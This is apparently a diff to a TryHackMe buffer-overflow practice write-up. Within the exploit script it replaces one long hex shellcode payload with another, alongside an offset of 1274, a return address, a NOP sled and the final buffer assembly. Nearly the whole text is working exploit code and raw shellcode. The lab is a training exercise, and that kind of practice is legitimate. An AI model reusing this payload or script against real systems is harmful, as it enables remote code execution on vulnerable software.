--- a/TryHackMe/Buffer_Overflow_Prep/3.md
+++ b/TryHackMe/Buffer_Overflow_Prep/3.md
@@ -304,40 +304,30 @@ offset = 1274
 overflow = "A" * offset
 retn = "\x03\x12\x50\x62"
 padding = "\x90" * 16
-payload = ("\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
-"\xff\xff\x48\xbb\x34\xca\x6f\x21\xbb\x15\x81\x70\x48\x31\x58"
-"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xc8\x82\xec\xc5\x4b\xfd"
-"\x41\x70\x34\xca\x2e\x70\xfa\x45\xd3\x21\x62\x82\x5e\xf3\xde"
-"\x5d\x0a\x22\x54\x82\xe4\x73\xa3\x5d\x0a\x22\x14\x82\xe4\x53"
-"\xeb\x5d\x8e\xc7\x7e\x80\x22\x10\x72\x5d\xb0\xb0\x98\xf6\x0e"
-"\x5d\xb9\x39\xa1\x31\xf5\x03\x62\x60\xba\xd4\x63\x9d\x66\x8b"
-"\x3e\x69\x30\x47\xa1\xfb\x76\xf6\x27\x20\x6b\x9e\x01\xf8\x34"
-"\xca\x6f\x69\x3e\xd5\xf5\x17\x7c\xcb\xbf\x71\x30\x5d\x99\x34"
-"\xbf\x8a\x4f\x68\xba\xc5\x62\x26\x7c\x35\xa6\x60\x30\x21\x09"
-"\x38\x35\x1c\x22\x10\x72\x5d\xb0\xb0\x98\x8b\xae\xe8\xb6\x54"
-"\x80\xb1\x0c\x2a\x1a\xd0\xf7\x16\xcd\x54\x3c\x8f\x56\xf0\xce"
-"\xcd\xd9\x34\xbf\x8a\x4b\x68\xba\xc5\xe7\x31\xbf\xc6\x27\x65"
-"\x30\x55\x9d\x39\x35\x1a\x2e\xaa\xbf\x9d\xc9\x71\xe4\x8b\x37"
-"\x60\xe3\x4b\xd8\x2a\x75\x92\x2e\x78\xfa\x4f\xc9\xf3\xd8\xea"
-"\x2e\x73\x44\xf5\xd9\x31\x6d\x90\x27\xaa\xa9\xfc\xd6\x8f\xcb"
-"\x35\x32\x68\x05\x62\xf2\x42\x6b\xf9\x5d\x21\xbb\x54\xd7\x39"
-"\xbd\x2c\x27\xa0\x57\xb5\x80\x70\x34\x83\xe6\xc4\xf2\xa9\x83"
-"\x70\x25\x96\x65\x27\xf6\x33\xc0\x24\x7d\x43\x8b\x6d\x32\xe4"
-"\xc0\xca\x78\xbd\x49\x26\x44\xc0\xcd\xf9\xde\xa2\x6e\x20\xbb"
-"\x15\xd8\x31\x8e\xe3\xef\x4a\xbb\xea\x54\x20\x64\x87\x5e\xe8"
-"\xf6\x24\x41\x38\xcb\x0a\x27\xa8\x79\x5d\x7e\xb0\x7c\x43\xae"
-"\x60\x01\xff\x8e\xaf\xd4\x35\xba\x69\x32\xd2\xeb\x60\x75\x92"
-"\x23\xa8\x59\x5d\x08\x89\x75\x70\xf6\x84\xcf\x74\x7e\xa5\x7c"
-"\x4b\xab\x61\xb9\x15\x81\x39\x8c\xa9\x02\x45\xbb\x15\x81\x70"
-"\x34\x8b\x3f\x60\xeb\x5d\x08\x92\x63\x9d\x38\x6c\x8a\xd5\xeb"
-"\x7d\x6d\x8b\x3f\xc3\x47\x73\x46\x34\x10\x9e\x6e\x20\xf3\x98"
-"\xc5\x54\x2c\x0c\x6f\x49\xf3\x9c\x67\x26\x64\x8b\x3f\x60\xeb"
-"\x54\xd1\x39\xcb\x0a\x2e\x71\xf2\xea\x49\x3d\xbd\x0b\x23\xa8"
-"\x7a\x54\x3b\x09\xf8\xf5\xe9\xde\x6e\x5d\xb0\xa2\x7c\x35\xa5"
-"\xaa\xb5\x54\x3b\x78\xb3\xd7\x0f\xde\x6e\xae\x61\x6d\x1e\xc0"
-"\x2e\x9b\x1d\x80\x3c\xed\xcb\x1f\x27\xa2\x7f\x3d\xbd\x76\x48"
-"\xc0\xef\xda\x5b\x60\x84\xcb\x73\xd9\x1d\x4e\xd1\x15\xd8\x31"
-"\xbd\x10\x90\xf4\xbb\x15\x81\x70")
+payload = ("\xfc\xbb\xc1\x04\x9a\xbb\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
+"\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3d\xec\x18\xbb\xbd"
+"\xed\x7c\x35\x58\xdc\xbc\x21\x29\x4f\x0d\x21\x7f\x7c\xe6\x67"
+"\x6b\xf7\x8a\xaf\x9c\xb0\x21\x96\x93\x41\x19\xea\xb2\xc1\x60"
+"\x3f\x14\xfb\xaa\x32\x55\x3c\xd6\xbf\x07\x95\x9c\x12\xb7\x92"
+"\xe9\xae\x3c\xe8\xfc\xb6\xa1\xb9\xff\x97\x74\xb1\x59\x38\x77"
+"\x16\xd2\x71\x6f\x7b\xdf\xc8\x04\x4f\xab\xca\xcc\x81\x54\x60"
+"\x31\x2e\xa7\x78\x76\x89\x58\x0f\x8e\xe9\xe5\x08\x55\x93\x31"
+"\x9c\x4d\x33\xb1\x06\xa9\xc5\x16\xd0\x3a\xc9\xd3\x96\x64\xce"
+"\xe2\x7b\x1f\xea\x6f\x7a\xcf\x7a\x2b\x59\xcb\x27\xef\xc0\x4a"
+"\x82\x5e\xfc\x8c\x6d\x3e\x58\xc7\x80\x2b\xd1\x8a\xcc\x98\xd8"
+"\x34\x0d\xb7\x6b\x47\x3f\x18\xc0\xcf\x73\xd1\xce\x08\x73\xc8"
+"\xb7\x86\x8a\xf3\xc7\x8f\x48\xa7\x97\xa7\x79\xc8\x73\x37\x85"
+"\x1d\xd3\x67\x29\xce\x94\xd7\x89\xbe\x7c\x3d\x06\xe0\x9d\x3e"
+"\xcc\x89\x34\xc5\x87\xbf\xce\x88\x71\xa8\xcc\x12\x6f\x74\x58"
+"\xf4\xe5\x94\x0c\xaf\x91\x0d\x15\x3b\x03\xd1\x83\x46\x03\x59"
+"\x20\xb7\xca\xaa\x4d\xab\xbb\x5a\x18\x91\x6a\x64\xb6\xbd\xf1"
+"\xf7\x5d\x3d\x7f\xe4\xc9\x6a\x28\xda\x03\xfe\xc4\x45\xba\x1c"
+"\x15\x13\x85\xa4\xc2\xe0\x08\x25\x86\x5d\x2f\x35\x5e\x5d\x6b"
+"\x61\x0e\x08\x25\xdf\xe8\xe2\x87\x89\xa2\x59\x4e\x5d\x32\x92"
+"\x51\x1b\x3b\xff\x27\xc3\x8a\x56\x7e\xfc\x23\x3f\x76\x85\x59"
+"\xdf\x79\x5c\xda\xff\x9b\x74\x17\x68\x02\x1d\x9a\xf5\xb5\xc8"
+"\xd9\x03\x36\xf8\xa1\xf7\x26\x89\xa4\xbc\xe0\x62\xd5\xad\x84"
+"\x84\x4a\xcd\x8c\x84\x6c\x31\x2f")
 postfix = ""
 
 buffer = prefix + overflow + retn + padding + payload + postfix
